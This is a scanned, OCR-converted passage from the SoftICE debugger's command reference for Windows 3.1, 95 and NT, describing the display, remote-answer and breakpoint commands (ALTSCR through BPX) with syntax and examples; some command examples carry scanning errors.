to an 

alternate monochrome monitor. 


ALTSCR requires the system to have two monitors attached. The alternate monitor 
should be 
a monochrome monitor in a character mode (the default mode). 


The default setting is ALTSCR mode OFF. 


Hint: To change the SoftICE display screen every time you run SoftICE, place 
the ALTSCR 

command in the Initialization string within your SoftICE configuration 
settings. Refer 

to Chapter 8, © Customizing SofticeE'' in the Using SoftICE guide. 


In the SoftICE program group, use Video Setup to select the monochrome monitor. 
SoftICE 

automatically starts out in monochrome mode making the ALTSCR command 
unnecessary. 
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Also use this setting if you are experiencing video problems even when ALTSCR 
ON is in the 
initialization string. 


%For Windows 95 

You can also start WINICE with the /M parameter to bypass the initial VGA 
programming 

and force SoftICE to the alternate monochrome screen. This is useful if your 
video board 

experiences conflicts with the initial programming. 


%Example 

To redirect screen output to the alternate monitor, use the following 
command: 

ALTSCR on 


: ANSWER 
AANSWER Windows 95, Windows NT Customization 
AAuto-answer and redirect console to modem. 


%Syntax 

ANSWER [on [com-port] [baud-rate] [i=init] | off] 

com-port: If no com-port is specified it uses COMI. 

baud-rate: Baud-rate to use for modem communications. The default is 38400. 
The rates include 1200, 2400, 4800, 9600, 19200, 23040, 28800, 

38400, 57000, 115000. 

i=init: Optional modem initialization string. 


%Use 

The ANSWER command allows SoftICE to answer an incoming call and redirect all 
output 

to a connecting PC running the SERIAL.EXE program in dial mode. After the 
command is 

executed, SoftICE listens for incoming calls on the specified com-port while 
the machine 

continues normal operation. Incoming calls are generated by the SERIAL.EXE 
program on a 

remote machine. 


You can place a default ANSWER initialization string in the SoftICE 
configuration settings. 
Refer to Chapter 8, Customizing SofticE'' in the Using SoftICE guide. 


when SoftICE detects a call being made after the ANSWER command has been 
entered, it 

pops up and indicates that it is making a connection with a remote machine, 
then pops down. 

The local machine appears to be hung while a remote connection is in effect. 
The ANSWER command can be cancelled at any time with ANSWER OFF. This stops 
SoftICE from listening for incoming calls. 


%Example 

The following is an example of the ANSWER command. SoftICE first initializes 
the modem 

on com-port 2 with the string © atx0,'' and then returns control to the command 
prompt. 

From that point on it answers calls made on the modem and attempts to connect 
at a baud 

rate of 38400bps. 

ANSWER on 2 38400 i=atx0 


The following is an example of a default ANSWER initialization string statement 
in your 
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SoftICE configuration settings. With this statement in place, SoftICE always 
initializes the 

modem specified in ANSWER commands with © ‘atx0,'' unless the ANSWER command 
explicitly specifies an initialization string. 

ANSWER=atx0 
See Also -SERIAL- 


: BC 
ABC Windows 3.1, Windows 95, Windows NT ManipulatingBreakpoints 
AClear one or more breakpoints. 


%Syntax 
BC list | * 
list: Series of breakpoint indexes separated by commas or spaces. 
*: Clears all breakpoints. 


%Example 
To clear all breakpoints, use the command: 
BC * 


To clear breakpoints 1 and 5, use the command: 
BC 1 5 


If you use the BL command (list breakpoints), the breakpoint list will be empty 
until you 
define more breakpoints. 


:BD 
ABD Windows 3.1, Windows 95, Windows NT ManipulatingBreakpoints 
ADisable one or more breakpoints. 


%Syntax 
BD list | * 
list: Series of breakpoint indexes separated by commas or spaces. 
*: bisables all breakpoints. 


%Use 

Use the BD command to temporarily deactivate breakpoints. Reactivate the 
breakpoints with 

the BE command (enable breakpoints). 


To tell which of the breakpoints are disabled, list the breakpoints with the BL 
command. A 
breakpoint that is disabled has an * (asterisk) after the breakpoint index. 


%Example 
To disable breakpoints 1 and 3, use the command: 
BD 13 


: BE 
ABE Windows 3.1, Windows 95, Windows NT ManipulatingBreakpoints 
AEnable one or more breakpoints. 


%Syntax BE list | * 
list: Series of breakpoint indexes separated by commas or spaces. 
*: Enables all breakpoints. 


%Use 
Use the BE command to reactivate breakpoints that you deactivated with 
the BD command (disable breakpoints). Note: You automatically enable a 
breakpoint when you first define it or edit it. 

%Example 
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To enable breakpoint 3, use the command: BE 3 


: BH 
ABH Windows 3.1, Windows 95, Windows NT Manipulating Breakpoints 
AList and/or select previously set breakpoints from the breakpoint history. 


%Syntax 
BH 


%Use 
Use the BH command to recall breakpoints that you set in both the current and 
previous 
SoftICE sessions. All saved breakpoints display in the Command window and can 
be selected 
using the following keys: 
%UpArrow 
Positions the cursor one line up. If the cursor is on the top line of the 
Command window, the list scrolls. 
%DownArrow 
Positions the cursor one line down. If the cursor is on the bottom line 
of the Command window, the list scrolls. 
%Insert 
Selects the breakpoint at the current cursor line, or deselects it if 
already selected. 
%Enter 
Sets all selected breakpoints. 
%ESC 
Exits breakpoint history without setting any breakpoints. 


SoftICE saves the last 32 breakpoints. 


%For Windows 3.1 and Windows 95 

Each time Windows exits normally, these breakpoints are written to the 
WINICE.BRK file in 

the same directory as WINICE.EXE. Every time SoftICE is loaded, it reads the 
breakpoint 

history from the WINICE.BRK file. 


%For Windows 95 

IF you choose to configure Windows 95 to load SoftICE before WIN.COM by 
appending 

\siw95\winice.exe to the end of your AUTOEXEC.BAT, Windows 95 does not return 
control 

to SoftICE when it shuts down unless you set the BootGUI option in MSDOS.SYS to 

BootGUI=0. If this option is set to BootGUI=1, SoftICE does not save the break- 
point 

history file. Refer to Chapter 2, Installing SoftICcE,'' in the Using SoftICE 
manual for more 

information about configuring when SoftICE loads. 


%For Windows NT 
Breakpoints are written to the WINICE.BRK file in the \SYSTEMROOT\SYSTEM32 
\DRIVERS directory. 


%Example 

To select any of the last 32 breakpoints from current and previous SoftICE 
sessions, use the 

command: 

BH 


:BL 
ABL Windows 3.1, Windows 95, Windows NT ManipulatingBreakpoints 
AList all breakpoints. 
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%Syntax 
BL 


%Use 

The BL command displays all breakpoints that are currently set. For each 
breakpoint, BL lists 

the breakpoint index, breakpoint type, breakpoint state, and any conditionals 
or breakpoint 

actions. 


The state of a breakpoint is either enabled or disabled. If you disable the 
breakpoint, an * 

(asterisk) appears after its breakpoint index. If SoftICE is activated due to a 
breakpoint, that 

breakpoint is highlighted. 


The BL command has no parameters. 


%Example 
To display all the breakpoints that have been defined, use the command. 
BL 


% For Windows 3.1 
Note: Breakpoint 1 has an * (asterisk) following it, showing that it was 
disabled. 


% For Windows 95 and Windows NT 
O BPMB #30:123400 W EQ 0010 DR3 C=03 
1* BPR #30:80022800 #30:80022FFF W C=01 
2 BPIO 0021 W NE 00FF C=01 
3 BPINT 21 AH=3D C=01 
00) BPX #8:80102A4B IF (EAX==1) DO © “DD ESI'' 
01) * BPX _LockWindowInfo 
02) BPMD #013F:0063F8A0 RW DR3 
03) BPINT 2E IF (EAX==@0x1E) 


: BMSG 
ABMSG Windows 3.1, Windows 95, Windows NT Breakpoints 
ASet a breakpoint on one or more Windows messages. 


%Syntax For Windows 3.1 
BMSG window-handle [L] [begin-msg [end-msg]] [c=count] 


%For Windows 95 and Windows NT 
BMSG window-handle [L] [begin-msg [end-msg ]] [IF expression] 
[DO "commandi;command2;..."] 


window-handle: HWND value returned from CreateWindow or CreateWindowEX. 

begin-msg: Single Windows message or lower message number in a range of 
Windows messages. If you do not specify a range with an end-msg, 
only the begin-msg will cause a break. 
Note: For both begin-msg and end-msg, the message numbers can be 
specified either in hexadecimal or by using the actual ASCII names of 
the messages, for example, WM_QUIT. 

end-msg: Higher message number in a range of Windows messages. 

L: Logs messages to the SoftICE Command window. 

c=: Breakpoint trigger count. 

IF expression Conditional expression: the expression must evaluate to TRUE 

(non- 
zero) for the breakpoint to trigger. 

DO: command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 
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Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, Using Breakpoints,'' in the Using SoftICE manual. 


%Use 
The BMSG command is used to set breakpoints on a window's message handler that 
will 
trigger when they receive messages that either match a specified message type, 
or fall within an 
indicated range of message types. 
If you do not specify a message range, the breakpoint applies to ALL Windows 
messages. 
If you specify the L parameter, SoftICE logs the messages into the Command 
window 
instead of popping up when the message occurs. 


When SoftICE does pop up on a BMSG breakpoint, the instruction pointer 
(CS:[E]IP) is on 

the first instruction of the message handling procedure. Each time SoftICE 
breaks, the current 

message displays in the following format: 


hwnd=xxxx wParam=xxxx lParam=xxxxXXXXx msg=XXxx message-name 


Note: These are the parameters that are passed to the message procedure. All 
numbers are 
hexadecimal. The message-name is the Windows defined name for the message. 


To display valid Windows messages, enter the WMSG command with no parameters. 
To 
obtain valid window handles, use the HWND command. 


You may set multiple BMSG breakpoints on one window-handle, although the 
message 
ranges for the breakpoints may not overlap. 


%Example 

This command sets a breakpoint on the message handler for the Window that has 
the handle 

9BC. The breakpoint triggers and SoftICE pops up when the message handler 
receives 

messages with a type within the range WM_MOUSEFIRST to WM_MOUSELAST, 

inclusive (which includes all of the Windows mouse messages). 

.:BMSG 9BC wm_mousefirst wm_mouselast 


The next command places a breakpoint on the message handler for the Window with 
the 

handle F4C. The L parameter causes the breakpoint information to be logged to 
the SoftICE 

Command window, instead of having SoftICE pop up when the breakpoint is 
triggered. The 

message range that the breakpoint triggers on includes any message with a type 
value less than 

or equal to WM_CREATE. Output from this breakpoint being triggered can be 
viewed by 

popping into SoftICE and scrolling through the command buffer. 

.:BMSG f4c L 0 wm_create 


: BPE 
ABPE Windows 3.1, Windows 95, Windows NT ManipulatingBreakpoints 
AEdit a breakpoint description. 


Pagina 659 di 991 


%Syntax 
BPE breakpoint-index 
breakpoint-index: Breakpoint index number. 


%Use 

The BPE command allows you to edit or replace an existing breakpoint. Use the 
editing keys 

to edit the breakpoint description. Press Enter to save a new breakpoint 
description. This 

command offers a quick way to modify the parameters of an existing breakpoint. 


Warning: BPE first clears the breakpoint before loading it into the edit line. 
If you then press 

the Escape key, the breakpoint is cleared. To retain the original breakpoint 
and 

create another one, use the BPT command, which uses the original breakpoint as 
an editing template without first deleting it. 


Conditional expressions and breakpoint actions are expanded as parts of the 
breakpoint 

expression. 
%Example 

This command allows the definition for breakpoint 1 to be edited. 

.:BPE 1 


when the command is entered, SoftICE displays the existing breakpoint 
definition and 

positions the input cursor just after the breakpoint address. 

.:BPE 1 

. :BPX 80104324 if (eax==1) do © dd esi'' 


To re-enter the breakpoint, press the Enter key. To clear the breakpoint, press 
the Escape key. 


:BPINT 
ABPINT Windows 3.1 Breakpoints 
ASet a breakpoint on an interrupt. 


%Syntax 
BPINT int-number [al|ah|ax=value] [c=count] 


int-number: Interrupt number from © - 5Fh. 
value: Byte or word value. 
c=: Breakpoint trigger count. 


%Use 

Use the BPINT command to pop up SoftICE whenever a specified processor 
exception, 

hardware interrupt, or software interrupt occurs. The AX register qualifying 
value 

(AL=, AH=, or AX=) can be used to set breakpoints that trigger only when the AX 
register at 

the time that the interrupt or exception occurs matches the specified value. 
This capability is 

often used to selectively set breakpoints for DOS and BIOS calls. If an AX 
register value is not 

entered, the breakpoint occurs anytime the interrupt or exception occurs, 
regardless of the 

value of the AX register at the time. 


For breakpoints that trigger for hardware interrupts or processor exceptions, 
the instruction 
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pointer (CS:EIP) at the time SoftICE pops up will point at the first 
instruction of the 

interrupt or exception handler routine pointed at by the IDT. If a software 
interrupt triggers 

the breakpoint, the instruction pointer (CS:EIP) points at the INT instruction 
that caused 

the breakpoint. 


BPINT only works for interrupts that are handled through the IDT. 

In addition, Windows maps hardware interrupts, which by default map to vectors 
8-Fh and 

70h-77h, to higher numbers to prevent conflicts with software interrupts. The 
primary 

interrupt controller is mapped from vector 50h-57h. The secondary interrupt 
controller is 

mapped from vector 58h-5Fh. 


Example: IRQO is INT50h and IRQ8 is INT58h. 


If a BPINT goes off due to a software interrupt instruction in a DOS VM, 
control will be 

transferred to the Windows protected mode interrupt handler for protection 
faults, which 

eventually call down to the appropriate DOS VM's interrupt handler (pointed at 
by the DOS 

VM's Interrupt Vector Table). To go directly to the DOS VM's interrupt handler 
after the 

BPINT has occurred on a software interrupt instruction, use the following 
command: 

G @$0:int-number*4 


%Example 

The following command defines a breakpoint for interrupt 21h. The breakpoint 
occurs when 

DOS function call 4Ch (terminate program) is called. At the time SoftICE pops 
up, the 

instruction pointer will point at the INT instruction in the DOS VM. 

BPINT 21 ah=4c 


The next command sets a breakpoint that triggers on each and every tick of the 
hardware 

clock (in general this is not recommended for the obvious reason that it 
triggers very often!). 

At the time SoftICE pops up, the instruction pointer will be at the first 
instruction of the 

Windows interrupt handler for interrupt 50h. 

BPINT 50 


:BPINT (NT) 
ABPINT Windows 95, Windows NT Breakpoints 
ASet a breakpoint on an interrupt. 


%Syntax 
BPINT int-number [IF expression] [DO "command1;command2;..."] 
int-number: Interrupt number from © - FFh. 
IF expression: Conditional expression: the expression must evaluate to TRUE 
(non- 
zero) for the breakpoint to trigger 
DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
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BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, Using Breakpoints,'' in the Using SoftICE manual. 


%Use 

Use the BPINT command to pop up SoftICE whenever a specified processor 
exception, 

hardware interrupt, or software interrupt occurs. The IF option allows 
arbitrary filtering of 

interrupts that result in breakpoints. The DO option provides the ability to 
associate SoftICE 

commands with interrupts such that they execute any time the interrupt 
breakpoint triggers. 


For breakpoints that trigger for hardware interrupts or processor exceptions, 
the instruction 

pointer (CS:EIP) at the time SoftICE pops up will point at the first 
instruction of the 

interrupt or exception handler routine pointed at by the IDT. If a software 
interrupt triggers 

the breakpoint, the instruction pointer (CS:EIP) will point at the INT 
instruction that caused 

the breakpoint. 


BPINT only works for interrupts that are handled through the IDT. 


If a software interrupt occurs in a DOS VM, control is transferred to a Windows 
protected 

mode interrupt handler, which eventually calls down to the DOS VM's interrupt 
handler 

(pointed at by the DOS VM's Interrupt Vector Table). To go directly to the DOS 
VM's 

interrupt handler after the BPINT has occurred on a software interrupt 
instruction, use the 

following command: 

G @ &O:(int-number*4) 


Windows maps hardware interrupts, which by default map to vectors 8-Fh and 70h- 
77h, to 

higher numbers to prevent conflicts with software interrupts. The primary 
interrupt 

controller is mapped from vector 50h-57h. The secondary interrupt controller is 
mapped 

from vector 58h-5Fh. 

Example: IRQO is INT50h and IRQ8 is INT58h. 


For Windows NT 

Windows NT maps hardware interrupts, which by default map to vectors 8-Fh and 
70h-77h, 

to higher numbers to prevent conflicts with software interrupts. The primary 
interrupt 

controller is mapped from vector 30h-37h. The secondary interrupt controller is 
mapped 

from vector 38h-83Fh. 

Example: IRQO is INT30h and IRQ8 is INT38h 


%Example 

The following example results in Windows NT system call (software interrupt 
2Eh) 

breakpoints only being triggered if the thread making the system call has a 
thread ID (TID) 

equal to the current thread at the time the command is entered (_TID). Each 
time the 
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breakpoint hits, the contents of the address 82345829h are dumped as a result 
of the DO 

option. 

BPINT 2e if tid== tid do "dd 82345829" 


:BPIO 
ABPIO Windows 3.1, Windows 95, Windows NT Breakpoints 
ASet a breakpoint on an 1/0 port access. 


%Syntax 
For Windows 3.1 
BPIO port [verb] [qualifier value] [c=count] 


For Windows 95 


BPIO [-h] port [verb] [IF expression] [DO "command1;command2;..."] 
For Windows NT 

BPIO port [verb] [IF expression] [DO "command1;command2;..."] 
port: Byte or word value. 

verb 

qualifier 


value: Byte, word, or dword value. 
c=: Breakpoint trigger count. 


Value Description 

R Read (IN) 

W Write (OUT) 

RW Reads and Writes 
Value Description 

EQ Equal 

NE Not Equal 

GT Greater Than 

LT Less Than 

M Mask. 


A bit mask is represented as a combination of 1's, 0's and X's. X's are don't- 
care bits. Qualifier, value, and C= are not valid for Windows 95 and Windows 
NT. 


-h: Use hardware debug registers to set a breakpoint in Vxd. Available for 
Pentium-class processors on Windows 95 only. 

IF expression Conditional expression: the expression must evaluate to TRUE 
(non- 

zero) for the breakpoint to trigger. 

DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, Using Breakpoints,'' in the Using SoftICE manual. 


%Use 

Use the BPIO instruction to have SoftICE pop up whenever a specified 1/0 port 
is accessed in 

the indicated manner. When a BPIO breakpoint triggers, the instruction pointer 
(CS:EIP) 

points to the instruction following the IN or OUT instruction that caused the 
breakpoint. 

If you do not specify a verb, RW is the default. 


For Windows 3.1 
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If you specify verb and value parameters, the value specified is compared with, 
according to 

the verb, the actual data value read or written by the IN or OUT instruction 
causing the 

breakpoint. The value may be a byte, a word, or a dword. The possible verbs 
allow for 

comparisons of equality, inequality, greater-than-or-equal, less-than-or-equal, 
and logical 

AND comparison. 


For Windows 3.1 and Windows 95 

Due to the behavior of the x86 architecture, BPIO breakpoints are only active 
while the 

processor is executing in the RING 3 privilege level. This means that 1/0 
activity performed 

by RING © code such as VxDs and the Windows VMM are not trapped by BPIO 
breakpoints. For Windows 95 only, use the -H switch to force SoftICE to use the 
hardware 

debug registers. This lets you trap I/0 performed at Ring 0 in VxDs. 

Windows virtualizes many of the system I/0 ports, meaning that VxDs have 
registered 

handlers that are called when RING 3 accesses are made to the ports. To get a 
list of 

virtualized ports, use the TSS command. The command shows each hooked 1/0 port 
plus the 

address of its associated handler and the name of the VxD that owns it. To see 
how a 

particular port is virtualized, set a BPX on the address of the 1/0 handler. 


For Windows NT 

The BPIO command uses the debug register support provided on the Pentium, 
therefore, 

I/0 breakpoints are only available on Pentium-class machines. 


When using debug registers for 1/0 breakpoints, all physical I/0 instructions 
(non-emulated) 

are trapped no matter what privilege level they are executed from. This is 
different from using 

the 1/0 bit map to trap 1/0, as is done for SoftICE running under Windows 3.1 
and 

Windows 95 (without the -H switch). The 1/0 bit map method can only trap 1/0 
done from 

user-level code, whereas a drawback of the debug register method for trapping 
port 1/0 is that 

it does not trap emulated I/0 such as 1/0 performed from a DOS box. 


Due to limitations in the number of debug registers available on x86 
processors, a maximum 
of four BPIOs can be set at any given time. 


%Example 
The following commands define conditional breakpoints for accesses to port 21h 
(interrupt 
control 1's mask register). The breakpoints only trigger if the access is a 
write access, and the 
value being written is not FFh. 
For Windows 3.1 
Use this command: BPIO 21 w ne ff 
For Windows 95 and Windows NT 
Use this command: BPIO 21 w if (al!=0xFF) 


Note: In the Windows NT example, you should be careful about intrinsic 
assumptions 
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being made about the size of the I/0 operations being trapped. The port 1/0 to 
be 

trapped is OUTB. An OUTW with AL==FFh also triggers the breakpoint, even 
though in that case the value in AL ends up being written to port 22h. 


The following example defines a conditional byte breakpoint on reads of port 
3FEh. The 
breakpoint occurs the first time that 1/0 port 3FEh is read with a value that 
has the two high- 
order bits set to 1. The other bits can be of any value. 

For Windows 3.1 Use this command: BPIO 3fe r eq m 11xx xxxx 

For Windows 95 and Windows NT Use this command: BPIO 8sfe r if ((al & 
OxCO)==0xC0) 


: BPM 
ABPM Windows 3.1, Windows 95, Windows NT Breakpoints 
ASet a breakpoint on memory access or execution. 


%Syntax 
For Windows 3.1 
BPM[size] address [verb] [qualifier value] [debug-reg] [c=count] 


For Windows 95 and Windows NT 
BPM[size] address [verb] [debug-reg] [IF expression] 
[DO "commandi;command2;..."] 


size: Size is actually a range covered by this breakpoint. For example, if you 
use double word, and the third byte of the dword is modified, a 
breakpoint occurs. The size is also important if you specify the 
optional qualifier. 


verb 
Value Description 
B Byte 
W Word 
D Double Word 
Value Description 
R Read 
W Write 
RW Reads and Writes 
X Execute 


qualifier: These qualifiers are only applicable to read and write breakpoints, 

not 
execution breakpoints. 

value: Byte, word, or double word value, depending on the size you specify. 

debug-reg 

c=: Breakpoint trigger count. 

IF expression Conditional expression: the expression must evaluate to TRUE 

(non- 
zero) for the breakpoint to trigger. 

DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 

BPLOG, and BPINDEX) with conditional expressions to monitor and control 

breakpoints based on the number of times a particular breakpoint has or has not 

triggered. See Chapter 6, © Using Breakpoints,'' in the Using SoftICE manual. 
%Use 

Use BPM breakpoints to have SoftICE pop up whenever certain types of accesses 
are made to 
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memory locations. The size and verb parameters allow for the accesses to be 
filtered according 

to their type, and the DO parameter (Windows NT only) allows for arbitrary 
SoftICE 

commands to be executed each time the breakpoint is hit. 

If you do not specify a debug register, SoftICE uses the first available debug 
register starting 

from DR3 and working backwards. You should not include a debug register unless 
you are 

debugging an application that uses debug registers itself such as a debugging 
tool. 


Value Description 
EQ Equal 
NE Not Equal 
GT Greater Than 
LT Less Than 
M Mask. A bit mask is represented as a 


combination of 1's, ©'s and X's. The X's 
are don't-care bits. 


DR3 
Qualifier, value, and C= are not valid for Windows 95 and Windows NT. 


If you do not specify a verb, RW is the default. 
If you do not specify a size, B is the default. 


For all the verb types except Xx, SoftICE pops up after the instruction that 
causes the 

breakpoint to trigger has executed. The CS:EIP points at the instruction in the 
code stream 

following the trapped instruction. In the case of the X verb, SoftICE pops up 
before the 

instruction causing the breakpoint to trigger has executed. The CS:EIP 
therefore points at the 

instruction where the breakpoint was set. 


If you specify the R verb, breakpoints occur on read accesses and on write 
operations that do 
not change the value of the memory location. 


If the verb is R, W or RW, executing an instruction at the specified address 
does not cause the 
breakpoint to occur. 


If you set a breakpoint using BPMW it is a word-sized memory breakpoint, then 
the specified 

address must start on a word boundary. If you set a breakpoint using BPMD the 
memory 

breakpoint is dword sized, then the specified address must start on a double 
word boundary. 


For Windows 3.1 

The count parameter can be used to have a breakpoint trigger only after it has 
been hit a 

specified number of times. The default count value is 1, meaning that the 
breakpoint triggers 

the first time the breakpoint condition is satisfied. The count is reset each 
time the breakpoint 

triggers. 
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For Windows 95 

BPM breakpoints set in the range 400000 - 7FFFFFFF (WIN32 applications) are 
address- 

context sensitive. That is, they are triggered only when the address context in 
which the 

breakpoint was set is active. If a BPM is set in a DLL that exists in multiple 
contexts, the 

breakpoint is armed in all the contexts in which it exists. For example, if you 
set a BPM X 

breakpoint in KERNEL32 it could break in any context that contains 
KERNEL32.DLL. 


For Windows NT 

Any breakpoint set on an address below 80000000h (2 GB) is address-context 
sensitive. This 

includes WIN32 and DOS V86 applications. Take care to ensure you are in the 
correct 

context before setting a breakpoint. 


%Example 

The following example defines a breakpoint on memory byte access to the address 
pointed at 

by ES:DI+1Fh. The first time that 10h is written to that location, the 
breakpoint triggers. 

For Windows 3.1 Use the command: BPM es:di+1f w eq 10 

. For Windows 95 and Windows NT Use the command: BPM es:di+1f w if 

(*(es:di+1f)==0x10) 


The next example defines an execution breakpoint on the instruction at address 
CS:80204D20h. The first time that the instruction at the address is executed, 
the breakpoint 
OCCUFS. 

For Windows 3.1, Window 95, and Windows NT Use the command: BPM CS:80204D20 x 


The following example defines a word breakpoint on a memory write. The 
breakpoint occurs 
the first time that location Foo has a value written to it that sets the high 
order bit to 0 and the 
low order bit to 1. The other bits can be any value. 
For Windows 3.1 Use the command: BPMW foo e eq m Oxxx XXXxX XXXX XXX1 


This example sets a byte breakpoint on a memory write. The breakpoint triggers 
the first time 
that the byte at location DS:80150000h has a value written to it that is 
greater than 5. 
For Windows 3.1 Use the command: BPM ds:80150000 w gt 5 
. For Windows 95 and Windows NT Use the command: BPM ds:80150000 if 
(byte(*ds:80150000)>5) 


: BPR 
ABPR Windows 3.1, Windows 95 Breakpoints 
ASet a breakpoint on a memory range. 


%Syntax 

Windows 3.1 

BPR start-address end-address [verb] [c=count] 
Windows 95 

BPR start-address end-address [verb] [IF expression] 
[DO "commandi;command2;..."] 


start-address: Beginning of memory range. 
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end-address: Ending of memory range. 

verb 

c=: Breakpoint trigger count. 

IF expression Conditional expression: the expression must evaluate to TRUE 

(non- 
zero) for the breakpoint to trigger. 

DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, © Using Breakpoints,'' in the Using SoftICE manual. 


Value Description 
R Read 
W Write 
RW Reads and Writes 


T Back Trace on Execution 
TW Back Trace on Memory Writes 


%Use 

Use the BPR command to set breakpoints that trigger whenever certain types of 
accesses are 

made to an entire address range. 


There is no explicit range breakpoint for execution access, however, execution 
breakpoints on 

ranges can be obtained with the R verb. An instruction fetch is considered a 
read for range 

breakpoints. 


If you do not specify a verb, W is the default. 


The range breakpoint degrades system performance in certain circumstances. Any 
read or 

write within the 4KB page that contains a breakpoint range is analyzed by 
SoftICE to 

determine if it satisfies the breakpoint condition. This performance 
degradation is usually not 

noticeable, however, degradation could be extreme in cases where there are 
frequent accesses 

to the range. 


The T and TW verbs enable back trace ranges on the specified range. They do not 
cause 

breakpoints, but instead result in information about all instructions that 
would have caused 

the breakpoint to trigger to be written to a log that can be displayed with the 
SHOW or 

TRACE commands. 


When a range breakpoint is triggered and SoftICE pops up, the current CS:EIP 
points at the 
instruction that caused the breakpoint. 


Range breakpoints are always set in the page tables that are active when the 
BPR command is 

entered. Therefore, if range addresses are below 4MB, the range breakpoint will 
be tied to the 

virtual machine that is current when BPR is entered. Because of this fact, 
there are some areas 

in memory where range breakpoints are not supported. These include the page 
tables, GDT, 


Pagina 668 di 991 


IDTS, LDT, and SoftICE. If you try to set a range breakpoint or back trace 
range over one of 
these areas, SoftICE returns an error. 


There are two other data areas in which you cannot place a range breakpoint, 
but if you do 

SoftICE will not complain. These are Windows level 0 stacks and critical areas 
in the VMM. 

Windows level 0 stacks are usually in separately allocated data segments. If 
you set a range 

over a level 0 stack or a critical area in VMM, you could hang the system. 

If the memory that covers the range breakpoint is swapped or moved, the range 
breakpoint 

follows it. 


For Windows 3.1 

The count parameter can be used to have a breakpoint trigger only after it has 
been hit a 

specified number of times. The default count value is 1, meaning that the 
breakpoint will 

trigger the first time the breakpoint condition is satisfied. The count is 
reset each time the 

breakpoint triggers. 


For Windows 95 

Due to a change in system architecture, BPRs are no longer supported in level 0 
code. Thus, 

you cannot use BPRs to trap VxD code. 


%Example 

The following example defines a breakpoint on a memory range. The breakpoint 
occurs if 

there are any writes to the memory between addresses ES:0 and ES:1FFF: 

BPR es:0 es:1fff w 


: BPRW 
ABPRW Windows 3.1, Windows 95 Breakpoints 
ASet range breakpoints on Windows program or code segment. 


%Syntax 
For Windows 3.1 
BPRW module-name | selector [verb] 


For Windows 95 
BPRW module-name | selector [verb] [IF expression] 
[DO "commandi;command2;..."] 


module-name: Any valid Windows Module name that contains executable code 


segments. 
selector: Valid 16-bit selector in a Windows program. 

verb 
IF expression Conditional expression: the expression must evaluate to TRUE 
(non- 


zero) for the breakpoint to trigger. 
DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


Note: You can combine breakpoint count functions (BPCOUNT, BPMISS, BPTOTAL, 
BPLOG, and BPINDEX) with conditional expressions to monitor and control 
breakpoints based on the number of times a particular breakpoint has or has not 
triggered. See Chapter 6, Using Breakpoints,'' in the Using SoftICE manual. 


Value Description 
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R Read 


NI Write 
RW Reads and Writes 
T Back Trace on Execution 


TW Back Trace on Memory Writes 


%Use 

The BPRW command is a short-hand way of setting range breakpoints on either all 
of the 

code segments, or on a single segment of a Windows program. 


The BPRW command actually sets BPR style breakpoints. Thus, if you enter the BL 
command after entering a BPRW command, you can see where separate range 
breakpoints 

were set to cover the segments specified in the BPRW command. 


Valid selectors for a 16-bit Windows program can be obtained with the HEAP 
instruction. 


Clearing the breakpoints created by BPRW commands requires that each of these 
range 
breakpoints be separately cleared with the BC command. 


Note: The BPRW command can become very slow when using the T verb to back trace 
or 
when using the command in conjunction with a CSIP qualifying range. 


For Windows 95 

Due to a change in system architecture, BPRs are no longer supported in level 0 
code. For 

example, you cannot use BPRs to trap VxD code. 


when a BPRW is set on a 32-bit application or DLL, a single range breakpoint is 
set starting 
at the executable image base and ending at the image base plus image size. 


Common Uses 
The BPRW command is commonly used to do the following: 

To set a back trace history range over an entire Windows application or DLL, 
specify the 

module-name and the T verb. 

To set a breakpoint that triggers whenever a program executes, use the R 
verb. This works 

because the R verb breaks on execution as well as reads. 

To use BPRW as a convenient form of BPR. Instead of requiring you to look up 
a 

segment's base and limit through the LDT or GDT commands, you only need to 
know 

the segment selector. 


%Example 

This example sets up a back trace range on all of the code segments in the 
Program Manager. 

All instructions that the Program Manager executes are logged to the back trace 
history buffer 

and can later be viewed with the TRACE and SHOW commands. 

BPRW progman t 


:BPT 
ABPT Windows 3.1, Windows 95 ManipulatingBreakpoints 
AUse a breakpoint description as a template. 


%Syntax 
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BPT breakpoint-index 
breakpoint-index: Breakpoint index number. 


%Use 

The BPT command uses an existing breakpoint description as a template for 
defining a new 

breakpoint. The BPT command loads a template of the breakpoint description into 
the edit 

line for modification. Use the editing keys to edit the breakpoint description 
and type Enter 

to add the new breakpoint description. The breakpoint referenced by breakpoint 
index is not 

altered. This command offers a quick way to modify the parameters of an 
existing breakpoint. 

Conditional expressions are expanded as parts of the breakpoint expression as 
well as 

breakpoint actions. 


%Example 

The following example moves a template of breakpoint 3 into the edit line 
(without removing 

breakpoint 3). An example of the edit line follows: 

BPT 3 

.:BPX 1b:401200 if (eax==1) do dd esi'' 

Press Enter to add the new breakpoint. 


: BPX 

ABPX WINDOWS 3.1, WINDOWS 95, WINDOWS NT BREAKPOINTS 
AF9 

ASet or clear a breakpoint on execution. 


%Syntax 
For Windows 3.1 
BPX [address] [c=count] 


For Windows 95 and Windows NT 
BPX [address] [IF expression] [DO "commandi;command2;..."] 


address: Linear address to set execution breakpoint. 
c=: Breakpoint trigger count. 
IF expression Conditional expression: the expression must evaluate to TRUE 
(non- 
zero) for the breakpoint to trigger. 
DO command Breakpoint action: A series of SoftICE commands can execute when 
the breakpoint triggers. 


